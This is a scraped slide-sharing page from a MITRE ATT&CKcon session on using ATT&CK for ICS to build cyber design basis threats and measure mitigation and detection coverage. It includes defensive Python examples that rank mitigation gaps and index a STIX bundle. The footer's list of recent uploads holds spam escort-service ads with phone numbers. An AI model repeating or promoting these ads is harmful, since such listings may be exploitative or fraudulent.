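    for m, ttps in rank_gaps(dbt, implemented):
        lines.append(f"add {m} {MITIGATION_NAMES.get(m, '')}: covers {', '.join(ttps)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report())
```

With only segmentation in place, the plan the greedy pass produces is multi-factor authentication, then antivirus/antimalware, then restricting web-based content, the same three mitigations the coverage slide highlights. "At least one mapped mitigation" is a low bar; the per-TTP fraction is there so that a single control on a six-mitigation technique does not read as done.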
LEVERAGING CYBER DBTS
ASSESSING MITIGATION COVERAGE
ATT&CK NAME
M1032 Multi-factor Authentication
  • T0859 Valid Accounts
  • T0822 External Remote Services
M1049 Antivirus / Antimalware
  • S0013 Trisis
  • T0862 Supply Chain Compromise
M1021 Restrict Web-Based Content
  • T0817 Drive-by Compromise
LEVERAGING CYBER DBTS
ASSESSING DETECTION COVERAGE
[Figure: ATT&CK Navigator layer showing detection coverage. Visible cells: Scripting sub-techniques (PowerShell, AppleScript, Windows Command Shell, Unix Shell, Visual Basic, Python, JavaScript/JScript) and Trisis [S0013].]
• DIGEST THREAT INTELLIGENCE
• WorldView, CISA, vendors, etc.
• UNDERSTAND YOUR SYSTEMS
• Crown Jewel Analysis
• EVALUATE YOUR DEFENSES
• Quantify your mitigation and detection coverage
• FOCUS ON THREAT BEHAVIORS
• Combine and correlate this information with a common lexicon (ATT&CK)
HOW TO CREATE A CYBER DBT
SUMMARY
• ASSESS EFFECTIVENESS OF DEFENSES
• EVALUATE THREAT DETECTION COVERAGE
• DEVELOP AND TEST IR PLAYBOOKS
• TRAIN PERSONNEL
• IDENTIFY ‘BEYOND DESIGN’ SCENARIOS
WHY SHOULD YOU USE CYBER DBTS?
SUMMARY
JBENJAMIN@DRAGOS.COM
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
What’s New with ATT&CK® for ICS?
Otis Alexander
https://attack.mitre.org/ics
@ojalexander
ATT&CK for ICS Mitigations
https://collaborate.mitre.org/attackics/index.php/Mitigations
• M0800-M0816 are new to ATT&CK for ICS
• Each mitigation has mappings to IEC 62443 and NIST SP 800-53
• Mitigations target the following stakeholders:
• Asset owner/operators
• Integrators
• Device vendors
• Security vendors
• There is a significant focus on protecting operational and
management interfaces of embedded controllers
STIX and Navigator Integration
•As part of ATT&CK v8, we released ATT&CK for ICS in
STIX
https://github.com/mitre/cti/tree/master/ics-attack
•A new version of ATT&CK Navigator was released as
well where you can pick the ICS domain
https://mitre-attack.github.io/attack-navigator/
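Publishing ATT&CK for ICS as STIX means the domain can be processed with the same code as Enterprise: techniques are attack-pattern objects, mitigations are course-of-action objects, and the link between them is a relationship of type "mitigates", with the ATT&CK ID carried in external_references. The following is an added example, not MITRE's code, that indexes a bundle of that shape into technique ID, name, tactics and mitigations, skipping revoked or deprecated objects. BUNDLE is a constructed minimal bundle with placeholder STIX IDs; the real file is ics-attack/ics-attack.json in the mitre/cti repository, and "mitre-ics-attack" as the source_name for the ICS domain is my assumption.

```python
"""Index an ATT&CK for ICS STIX 2.0 bundle into
{technique ID: {name, tactics, mitigations}} using the object types the
mitre/cti repository publishes.

Added example, not MITRE's code. BUNDLE is a constructed, minimal bundle of
the same shape with placeholder IDs; the real file is ics-attack/ics-attack.json
in https://github.com/mitre/cti. SOURCE is my assumption for the ICS domain.
"""
import json

SOURCE = "mitre-ics-attack"

AP_VALID_ACCOUNTS = "attack-pattern--00000000-0000-4000-8000-000000000001"
AP_EXT_REMOTE = "attack-pattern--00000000-0000-4000-8000-000000000002"
AP_REVOKED = "attack-pattern--00000000-0000-4000-8000-000000000003"
COA_MFA = "course-of-action--00000000-0000-4000-8000-0000000000a1"
COA_SEGMENTATION = "course-of-action--00000000-0000-4000-8000-0000000000a2"

BUNDLE = {
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000000",
    "objects": [
        {"type": "attack-pattern", "id": AP_VALID_ACCOUNTS, "name": "Valid Accounts",
         "kill_chain_phases": [{"kill_chain_name": SOURCE, "phase_name": "persistence"},
                               {"kill_chain_name": SOURCE, "phase_name": "lateral-movement"}],
         "external_references": [{"source_name": SOURCE, "external_id": "T0859"}]},
        {"type": "attack-pattern", "id": AP_EXT_REMOTE, "name": "External Remote Services",
         "kill_chain_phases": [{"kill_chain_name": SOURCE, "phase_name": "initial-access"}],
         "external_references": [{"source_name": SOURCE, "external_id": "T0822"}]},
        {"type": "attack-pattern", "id": AP_REVOKED, "name": "Old Technique", "revoked": True,
         "external_references": [{"source_name": SOURCE, "external_id": "T0999"}]},
        {"type": "course-of-action", "id": COA_MFA, "name": "Multi-factor Authentication",
         "external_references": [{"source_name": SOURCE, "external_id": "M0932"}]},
        {"type": "course-of-action", "id": COA_SEGMENTATION, "name": "Network Segmentation",
         "external_references": [{"source_name": SOURCE, "external_id": "M0930"}]},
        {"type": "relationship", "id": "relationship--00000000-0000-4000-8000-0000000000r1",
         "relationship_type": "mitigates", "source_ref": COA_MFA, "target_ref": AP_VALID_ACCOUNTS},
        {"type": "relationship", "id": "relationship--00000000-0000-4000-8000-0000000000r2",
         "relationship_type": "mitigates", "source_ref": COA_MFA, "target_ref": AP_EXT_REMOTE},
        {"type": "relationship", "id": "relationship--00000000-0000-4000-8000-0000000000r3",
         "relationship_type": "mitigates", "source_ref": COA_SEGMENTATION, "target_ref": AP_VALID_ACCOUNTS},
        # points at a revoked technique: must be ignored
        {"type": "relationship", "id": "relationship--00000000-0000-4000-8000-0000000000r4",
         "relationship_type": "mitigates", "source_ref": COA_SEGMENTATION, "target_ref": AP_REVOKED},
        # a "uses" relationship (group -> technique) is not a mitigation
        {"type": "relationship", "id": "relationship--00000000-0000-4000-8000-0000000000r5",
         "relationship_type": "uses", "source_ref": "intrusion-set--00000000-0000-4000-8000-0000000000b1",
         "target_ref": AP_VALID_ACCOUNTS},
    ],
}


def attack_id(obj, source=SOURCE):
    """The ATT&CK ID (T0859, M0932, ...) from an object's external references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == source:
            return ref.get("external_id")
    return None


def load_bundle(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def index_bundle(bundle, source=SOURCE):
    live = {o["id"]: o for o in bundle["objects"]
            if not o.get("revoked") and not o.get("x_mitre_deprecated")}
    techniques = {}
    for o in live.values():
        if o["type"] == "attack-pattern" and attack_id(o, source):
            techniques[attack_id(o, source)] = {
                "name": o["name"],
                "tactics": [p["phase_name"] for p in o.get("kill_chain_phases", [])
                            if p.get("kill_chain_name") == source],
                "mitigations": [],
            }
    for o in live.values():
        if o["type"] != "relationship" or o.get("relationship_type") != "mitigates":
            continue
        coa, ap = live.get(o["source_ref"]), live.get(o["target_ref"])
        if not coa or not ap:          # one side revoked, deprecated or absent
            continue
        tid = attack_id(ap, source)
        if tid in techniques:
            techniques[tid]["mitigations"].append((attack_id(coa, source), coa["name"]))
    for t in techniques.values():
        t["mitigations"].sort()
    return techniques
```

Filtering revoked and deprecated objects before resolving relationships matters on the real bundle: ATT&CK keeps superseded objects in the file for reference, and a coverage view built without the filter double-counts them.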
What’s on the Horizon?
Updates to Data Sources
• Maintaining visibility into ICS networks is essential for
quickly detecting and remediating cyber threats.
• Understanding the various data sources that are available in
ICS networks is key to this endeavor. Network traffic is a
popular source of data in ICS networks but there are other
valuable sources of data that are often overlooked.
• Embedded device logs
• Application logs
• Operational databases
Data Sources
• Configuration: firmware version, system settings, control logic, parameters
• Performance and Statistics: CPU, memory, disk, ethernet, etc.; network connection information
• Process Information: I/O values associated with tags; alarms and faults (e.g., digital fault recorder); events (e.g., command execution); process quality (e.g., phasor measurement unit)
• Asset Management: condition-based monitoring, predictive maintenance, work order system
• Physical: physical sensors (e.g., tamper detection)
ICS Attacks Mapped to Enterprise
• We’re currently working on mapping the following ICS attacks:
• Stuxnet
• Ukraine 2015
• Industroyer
• Triton
• Adversaries do not respect theoretical boundaries (i.e., IT/ICS)
so it is important to have a deep understanding of how IT
platforms are leveraged to access and impact ICS.
We Need Your Help!
•How can we improve ATT&CK for ICS?
•How are you currently using mitigations?
•Do you have any opinions on our data
source focus?
attack@mitre.org
@MITREattack
Otis Alexander
@ojalexander
Join our next session
on January 14
Register now!
https://na.eventscloud.com/ATTACKcon-power-hour
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019Thang Nguyen
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 -  Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 -  Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckNorth Texas Chapter of the ISSA
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosOuthai SAIOUDOM
 
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting ProgramIDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting ProgramDigit Oktavianto
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersFelipe Prado
 
Cyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptxCyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptxYashSomalkar
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksCiNPA Security SIG
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
 
50+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 202250+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 2022Temok IT Services
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfxererenhosdominaram
 

Similar to MITRE ATTACKCon Power Hour - December (20)

From Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have ChangedFrom Theory to Practice: How My ATTACK Perspectives Have Changed
From Theory to Practice: How My ATTACK Perspectives Have Changed
 
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
Virtual Splunk User Group - Phantom Workbook Automation & Threat Hunting with...
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
All These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDFAll These Sophisticated Attacks, Can We Really Detect Them - PDF
All These Sophisticated Attacks, Can We Really Detect Them - PDF
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019Mitre getting-started-with-attack-october-2019
Mitre getting-started-with-attack-october-2019
 
Total E(A)gression defcon
Total E(A)gression   defconTotal E(A)gression   defcon
Total E(A)gression defcon
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 -  Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 -  Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
 
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting ProgramIDSECCONF 2020 :  A Tale Story of Building and Maturing Threat Hunting Program
IDSECCONF 2020 : A Tale Story of Building and Maturing Threat Hunting Program
 
DEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testersDEF CON 23 - Wesley McGrew - i hunt penetration testers
DEF CON 23 - Wesley McGrew - i hunt penetration testers
 
Cyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptxCyber Security Workshop Presentation.pptx
Cyber Security Workshop Presentation.pptx
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseSANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
SANSFIRE18: War Stories on Using Automated Threat Intelligence for Defense
 
50+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 202250+ Frequently Asked Cryptography Interview Questions in 2022
50+ Frequently Asked Cryptography Interview Questions in 2022
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
 
Super1
Super1Super1
Super1
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 

More from MITRE - ATT&CKcon

ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceMITRE - ATT&CKcon
 
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by AdversariesATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by AdversariesMITRE - ATT&CKcon
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...MITRE - ATT&CKcon
 
MITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - JanuaryMITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - JanuaryMITRE - ATT&CKcon
 
Using ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power PlantsUsing ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power PlantsMITRE - ATT&CKcon
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?MITRE - ATT&CKcon
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?MITRE - ATT&CKcon
 
ATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the MatricesATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the MatricesMITRE - ATT&CKcon
 
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for MobileMapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for MobileMITRE - ATT&CKcon
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionMITRE - ATT&CKcon
 
TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020MITRE - ATT&CKcon
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchMITRE - ATT&CKcon
 
What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?MITRE - ATT&CKcon
 
Starting Over with Sub-Techniques
Starting Over with Sub-TechniquesStarting Over with Sub-Techniques
Starting Over with Sub-TechniquesMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...MITRE - ATT&CKcon
 

More from MITRE - ATT&CKcon (20)

ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat IntelligenceATTACKers Think in Graphs: Building Graphs for Threat Intelligence
ATTACKers Think in Graphs: Building Graphs for Threat Intelligence
 
State of the ATTACK
State of the ATTACKState of the ATTACK
State of the ATTACK
 
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by AdversariesATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
ATTACK-Onomics: Attacking the Economics Behind Techniques Used by Adversaries
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
 
MITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - JanuaryMITRE ATTACKcon Power Hour - January
MITRE ATTACKcon Power Hour - January
 
Using ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power PlantsUsing ATTACK to Create Cyber DBTS for Nuclear Power Plants
Using ATTACK to Create Cyber DBTS for Nuclear Power Plants
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?
 
Putting the PRE into ATTACK
Putting the PRE into ATTACKPutting the PRE into ATTACK
Putting the PRE into ATTACK
 
What's a MITRE with your Security?
What's a MITRE with your Security?What's a MITRE with your Security?
What's a MITRE with your Security?
 
ATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the MatricesATTACKing the Cloud: Hopping Between the Matrices
ATTACKing the Cloud: Hopping Between the Matrices
 
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for MobileMapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
Mapping the EventBot Mobile Banking Trojan with MITRE ATTACK for Mobile
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis Question
 
TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020TA505: A Study of High End Big Game Hunting in 2020
TA505: A Study of High End Big Game Hunting in 2020
 
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and ResearchUsing MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
Using MITRE PRE-ATTACK and ATTACK in Cybercrime Education and Research
 
What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?What's New with ATTACK for Cloud?
What's New with ATTACK for Cloud?
 
Starting Over with Sub-Techniques
Starting Over with Sub-TechniquesStarting Over with Sub-Techniques
Starting Over with Sub-Techniques
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
 
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
MITRE ATT&CKcon 2.0: Keynote Address - The Friends We Made Along the Way; Ton...
 
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
MITRE ATT&CKcon 2.0: Alertable Techniques for Linux Using ATT&CK; Tony Lamber...
 
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
MITRE ATT&CKcon 2.0: ATT&CK Coverage Assessment from a Data Perspective; Olaf...
 

Recently uploaded

Building the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized StorageBuilding the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized StorageTechSoup
 
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...CedZabala
 
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile ServiceCunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile ServiceHigh Profile Call Girls
 
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxxIncident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxxPeter Miles
 
Climate change and occupational safety and health.
Climate change and occupational safety and health.Climate change and occupational safety and health.
Climate change and occupational safety and health.Christina Parmionova
 
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...Dipal Arora
 
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Bookingroncy bisnoi
 
Climate change and safety and health at work
Climate change and safety and health at workClimate change and safety and health at work
Climate change and safety and health at workChristina Parmionova
 
2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos Webinar2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos WebinarLinda Reinstein
 
Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.Christina Parmionova
 
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130  Available With RoomVIP Kolkata Call Girl Jatin Das Park 👉 8250192130  Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Roomishabajaj13
 
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated  Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Top Rated  Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Call Girls in Nagpur High Profile
 
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation -  Humble BeginningsZechariah Boodey Farmstead Collaborative presentation -  Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginningsinfo695895
 
Item # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdfItem # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdfahcitycouncil
 
Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024ARCResearch
 
2024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 292024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 29JSchaus & Associates
 
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...Suhani Kapoor
 
2024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 282024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 28JSchaus & Associates
 
Fair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CTFair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CTaccounts329278
 

Recently uploaded (20)

Building the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized StorageBuilding the Commons: Community Archiving & Decentralized Storage
Building the Commons: Community Archiving & Decentralized Storage
 
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
Artificial Intelligence in Philippine Local Governance: Challenges and Opport...
 
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile ServiceCunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
Cunningham Road Call Girls Bangalore WhatsApp 8250192130 High Profile Service
 
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
